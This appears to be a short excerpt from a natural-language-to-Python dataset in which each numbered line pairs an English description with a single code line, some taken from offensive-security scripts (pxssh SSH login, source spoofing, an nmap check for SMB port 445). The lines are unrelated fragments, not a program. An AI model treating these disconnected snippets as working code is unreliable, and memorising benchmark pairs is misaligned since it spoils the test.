For each line in the method readlines with no argument of fn for line in fn.readlines():
897 |
Define the function printDownloads with argument downloadDB def printDownloads(downloadDB):
898 |
Call method prompt with no argument on s s.prompt()
899 |
Assign to iface the string 'eth0' iface = 'eth0'
900 |
Import the library to perform a SSH connection import pxssh
901 |
Assign to srcSpoof the srcSpoof of options srcSpoof = options.srcSpoof
902 |
If the method has_tcp called with argument 445 of nmScan sliced at host is equal to True if nmScan[host].has_tcp(445):
903 |
Assign to new_gr the result of the function Google_result with arguments title, text, url new_gr = Google_Result(title, text, url)